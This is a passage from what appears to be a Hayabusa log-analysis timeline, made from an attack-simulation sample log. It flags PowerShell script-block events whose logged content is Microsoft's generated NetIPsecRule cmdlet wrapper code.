[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( 
[Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 